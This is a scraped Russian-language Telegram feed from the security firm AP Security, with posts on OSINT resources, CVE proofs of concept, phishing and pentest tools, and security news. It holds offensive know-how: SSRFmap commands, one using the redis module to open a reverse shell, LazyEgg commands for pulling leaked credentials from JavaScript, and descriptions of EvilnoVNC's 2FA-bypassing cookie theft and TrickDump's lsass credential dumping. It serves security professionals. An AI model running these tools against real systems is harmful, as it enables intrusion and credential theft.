AP Security
3.45K subscribers
277 photos
2 videos
61 files
527 links
Лаборатория инновационных технологий и кибербезопасности. ( Laboratory of innovation technologies and cybersecurity )
Новости, события, мероприятия, технические обзоры

По вопросам сотрудничества:
@P1N_C0DE
Download Telegram
#osint

🔍Удивительный OSINT

Этот насыщенный список инструментов создан помочь всем, кто занимается Cyber Threat Intellience (CTI), охотой за угрозами или осинтом. Ресурс полезен от начинающих специалистов до продвинутых.
Please open Telegram to view this post
VIEW IN TELEGRAM
55🆒4
#pentest

📱 PoC Microsoft Outlook Remote Code Execution CVE-2024-21413

13 февраля 2024 года компания Microsoft выпустила предупреждение для своих пользователей о критической уязвимости в пакете Office, которая позволяет злоумышленникам удаленно выполнять вредоносный код.

Уязвимость затрагивает несколько продуктов Microsoft Office, включая приложения 365 Enterprise, Office 2016 и 2019, а также Office LTSC 2021.

➡️ PoC на данную уязвимость: https://blog.injectexp.dev/outlook-cve-2024-21413-for-rce-hacking-through-a-letter/07/rce/

В строке 27 необходимо указать путь к файлу на вашем сервере. В описании к скрипту имеются комментарии.

Об уязвимости: https://habr.com/ru/articles/798759/
Please open Telegram to view this post
VIEW IN TELEGRAM
533🆒3👎1😴1😎1
#pentest #redteam

⬇️ Фишинговая платформа EvilnoVNC

Наверняка не раз Вы слышали об опыте использования опенсорсного продукта Gophish. В дополнение к этому базовому инструменту прикладываем EvilnoVNC.

EvilnoVNC - это готовая к работе фишинговая платформа.

В отличие от других фишинговых технологий, EvilnoVNC позволяет обойти 2FA, используя реальный браузер через noVNC-соединение.

Кроме того, этот инструмент позволяет в режиме реального времени видеть все действия жертвы, осуществлять доступ к загруженным файлам и изучать весь профиль браузера, включая куки, сохраненные пароли, историю просмотров и многое другое.

🔔 Также прикладываем свежий обзор на существующие утилиты для осуществления фишинговой рассылки в рамках Ваших проектов по аудиту безопасности.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥55🆒3🤔2😴1
📱 Кто стучится в почту? Social engineering 2024

PDF или SVG smuggling, PDF polyglot, PDF luring в докладе Константина Полишина об актуальных методах проведения фишинга в рамках Red team проектов являются дополнением к материалам PHD12.

С первой частью составного доклада по этой теме можно ознакомиться по следующей ссылке. В прошлогоднем выпуске PT также расписан материал первой части.

Приятного просмотра🌟
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥6🆒44
🎙 До начала торжественной церемонии остаётся 9 часов

Именно сегодня, в 19:00 ⚡️ , стартует трансляция награждения участников премии Pentest Award.

В этом году лаборатория инновационных технологий и кибербезопасности компании AP Security принимала участие в нескольких номинациях.

Данное мероприятие является праздником для энтузиастов информационной безопасности и позволяет раскрыть в себе творческий и профессиональный потенциал, оценить свои силы, познакомиться с единомышленниками и вдохновиться на что-то новое и интересное.

Мы также в онлайне будем радоваться успехам всех финалистов данной премии и поздравлять своих коллег с попадаем на торжественную церемонию.

🐦 Всем желаем интересных проектов, вдохновения и удачи во всём, к чему лежит душа и делает мир кибербезопаности более насыщенным и интересным!
Please open Telegram to view this post
VIEW IN TELEGRAM
10❤‍🔥7🆒4
#infosec

🐶 Новый PyPI-пакет Zlibxjson крадет данные Discord и браузеров

Вредоносный пакет под названием zlibxjson версии 8.2 был отмечен системой обнаружения вредоносного ПО, управляемой искусственным интеллектом компании Fortinet.

Было замечено, что пакет тайно загружает несколько файлов, включая исполняемый файл (.exe) с пакетом PyInstaller, который при распаковке содержит несколько файлов Python и DLL.

Среди них особенно опасными оказались три Python-скрипта - Discord_token_grabber.py, get_cookies.py и password_grabber.py.


📱 Windows-версия WhatsApp позволяет запускать Python и PHP без предупреждения

Проблема в безопасности последней версии WhatsApp (принадлежит компании Meta, признанной экстремистской и запрещенной в России) для Windows позволяет отправлять Python- и PHP-вложения, которые будут выполняться на устройстве пользователя без каких-либо предупреждений.

Для успешной эксплуатации этого бага в системе жертвы должен быть установлен Python. Это условие может сузить список потенциальных жертв до разработчиков софта.

🔔 Власти Израиля изъяли документы и компьютеры у создателей шпионской программы Pegasus, чтобы они не попали в США

Утечка из Министерства юстиции Израиля указывает на то, что правительство страны изъяло документы и компьютеры у компании NSO Group, чтобы предотвратить передачу потенциально компрометирующих материалов в рамках судебного процесса в США. Об этом в конце июля 2024 г. сообщило The Guardian.

По информации The Guardian, ставки запредельно высоки, поскольку судебное разбирательство может раскрыть исключительно секретную информацию, касающуюся шпионского программного обеспечения (ПО) под названием Pegasus, одного из самых известных хакерских инструментов в мире.
Please open Telegram to view this post
VIEW IN TELEGRAM
6🆒4❤‍🔥3
Forwarded from Machete Hack
Автоматизация с помощью SSRFmap 👁‍🗨

Проверенный временем, инструмент для автоматизации SSRF атак, поддерживающий большое количество модулей, кодирование нагрузки для bypass'а WAF'ов, создание reverse shell соединения

☄️ https://github.com/swisskyrepo/SSRFmap ☄️

Ставим на хост
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py


Поднимаем докер
git clone https://github.com/swisskyrepo/SSRFmap
docker build --no-cache -t ssrfmap .
docker run -it ssrfmap ssrfmap.py [OPTIONS]
docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py


Пример команды, где опция -r —> запрос, сохраненный из Burp Suite, -p —> тестируемый параметр, -m —> используемые модули
python ssrfmap.py -r request.txt -p url -m readfiles,portscan


Используем модуль redis, который сразу пробует проэксплуатировать RCE, где параметры LHOST и LPORT служат для создания reverse shell
python ssrfmap.py -r request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242


И в конце небольшой Cheat Sheet по SSRF 💫
Please open Telegram to view this post
VIEW IN TELEGRAM
54❤‍🔥3🆒2
Forwarded from K0N70R4
Теперь о текущем
Делаюсь своим опытом и скиллом написания скриптов для gdb
Признаюсь,братцы,вам: gdb это не страшная бабка из астрала, а очень добрый друг Каспер, который может облегчить вам жизнь
Ни раз сталкивался с тем, что нужно было что-то автоматизировать в отладчиках, работая с фаззерами
Поэтому берите и юзайте
Встречайте первую статью - Признаюсь, братцы, вам гдбшку я любил GDB Scripting Linux and Windows
#osint

🔍 Telegram-OSINT

Отдельный репозиторий для поиска информации в Telegram, содержащий огромное количество ресурсов.

⚡️Начинающим специалистам стоит не забывать про OPSEC при работе с ботами, требующими номер и собирающими информацию о Вашем аккаунте.
Please open Telegram to view this post
VIEW IN TELEGRAM
7🆒4❤‍🔥3
#tools #pentest

📎 PoC CVE-2024-21338

Уязвимость CVE-2024-21338 была обнаружена специалистами Avast в драйвере appid.sys Windows AppLocker, о чем они сообщили Microsoft в августе прошлого года, предупредив, что уязвимость уже активно эксплуатируют злоумышленники.

🟡Подробнее об этой уязвимости написано в статье на Хакер.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥432👏2😎2🆒1
#forensics

📡 Kdrill

Инструмент на Python для проверки руткитов в ядре Windows.

Kdrill получает доступ к физической памяти и декодирует внутренние структуры ОС, чтобы исследовать их и проверить целостность.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥5🆒44
#infosec

🌟Руководство OpenAI разделилось во мнениях относительно собственной технологии водяного знака ИИ

У OpenAI есть инструмент для автоматического нанесения водяных знаков на контент, созданный искусственным интеллектом, но руководство компании разделилось во мнении, стоит ли выпускать его в открытый доступ.

Инструмент якобы готов к выпуску, но проект уже два года находится во внутренней дискуссии.

Опрос, проведенный компанией в апреле 2023 года среди постоянных пользователей ChatGPT, показал, что почти треть из них отказались бы от этой технологии, главным образом потому, что она может обнаружить списывание и плагиат.

⚡️Уязвимости 5G позволяют следить за владельцами мобильных устройств

Исследователи из Университета Пенсильвании на конференции Black Hat, которая проходит в Лас-Вегасе, продемонстрировали метод слежки за владельцами мобильных устройств с помощью baseband-брешей в 5G.

Используя кастомный инструмент 5GBaseChecker, специалисты выявили уязвимости в базовой полосе, которые применяют 5G-модемы таких производителей, как Samsung, MediaTek и Qualcomm (используются в телефонах Google, OPPO, OnePlus, Motorola и Samsung).

💰 Атака напрокат: в даркнете стоимость готовых ботнетов для массовых атак начинается от 99 долларов США

Эксперты Kaspersky Digital Footprint Intelligence проанализировали объявления о предоставлении услуг, связанных с эксплуатацией ботнетов в даркнете и специализированных Telegram-каналах.

Для создания ботнетов могут использоваться уязвимые пользовательские и корпоративные гаджеты, например со слабыми паролями: от умных камер до продвинутых промышленных устройств. Аналитики «Лаборатории Касперского» в первом полугодии 2024 года зафиксировали рост более чем в два раза числа заражённых IoT-устройств в Росcии по сравнению с аналогичным периодом в прошлом году.

Такие инструменты могут обладать индивидуальными настройками и различаться по способам заражения, типу используемого вредоносного ПО, инфраструктуре, методам обхода обнаружения. Их разрабатывают для продажи на теневом рынке, а стоимость зависит от качества. В объявлениях за 2024 год, которые проанализировали эксперты, самая низкая цена составила 99 долларов США, а самая высокая — 10 тысяч долларов США. Ботнеты также можно взять в аренду: стоимость такой услуги варьируется от 30 до 4 800 долларов США в месяц.
Please open Telegram to view this post
VIEW IN TELEGRAM
6❤‍🔥4🆒4
Forwarded from Machete Hack
This media is not supported in your browser
VIEW IN TELEGRAM
🔠🔠 🔠🔠🔠🔠🔠

Недавно на github'е наткнулся на интересную утилиту LazyEgg, позволяющую добывать ссылки, фото, URL'ы, айпишники, креды, ключи по целевому URL, а также искать и анализировать js файлы по сигнатурам
https://github.com/schooldropout1337/lazyegg

▶️ Установить утилиту
git clone https://github.com/schooldropout1337/lazyegg.git


▶️ Обычный скан по целевому URL
python lazyegg.py https://localhost:8080


▶️ Для поиска скрытых js файлов, можем воспользоваться следующей командой
python lazyegg.py https://localhost:8080/js --js_scan --w wordlist.txt


▶️ LazyEgg позволяет сканить и отдельные js файлы на наличие сигнатур, для этого нужно создать дополнительный файл с URL' ами js файлов
cat jsurls.txt | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg.py "{}" --js_urls --domains --ips --leaked_creds'


▶️ Можно воспользоваться скриптом, использующий вывод утилиты waybackurls для дальнейшего скана
waybackurls vulnweb.com | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg.py "{}" --js_urls --domains --ips' > jsurls.log && cat jsurls.log | grep '\.' | sort -u


▶️ Также LazyEgg имеет свое расширение для Chrome, чтобы его поставить, которое находится в архиве le-jsurl.zip репозитория
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥116🆒3
#tools #pentest

🪆 TrickDump ( lsass dump)

TrickDump генерирует дамп процесса lsass без создания файла Minidump, вместо этого генерируя 3 JSON и 1 ZIP файл с дампами областей памяти. В три шага:

🟥Получение информации об ОС с помощью RtlGetVersion.

🟥Получение привилегии SeDebugPrivilege с помощью NtOpenProcessToken и NtAdjustPrivilegeToken, открытие хэндла с помощью NtGetNextProcess и NtQueryInformationProcess, а затем получение информации о модулях с помощью NtQueryInformationProcess и NtReadVirtualMemory.

🟥Получение привилегии SeDebugPrivilege, открытие хэндла, а затем сбор информации и дампа областей памяти с помощью функций NtQueryVirtualMemory и NtReadVirtualMemory.

Узнать о других подходах и нюансах работы с процессом lsaas можно в следующей статье.
Please open Telegram to view this post
VIEW IN TELEGRAM
843🤨1😴1
Incident Response Plan Workflow.pdf
1.3 MB
#soc

⚡️Реагирование на инциденты

Короткий мануал с этапами реагирования на инциденты с наглядным разбором практических кейсов по ним.

Приятного прочтения📔
Please open Telegram to view this post
VIEW IN TELEGRAM
8🆒5❤‍🔥4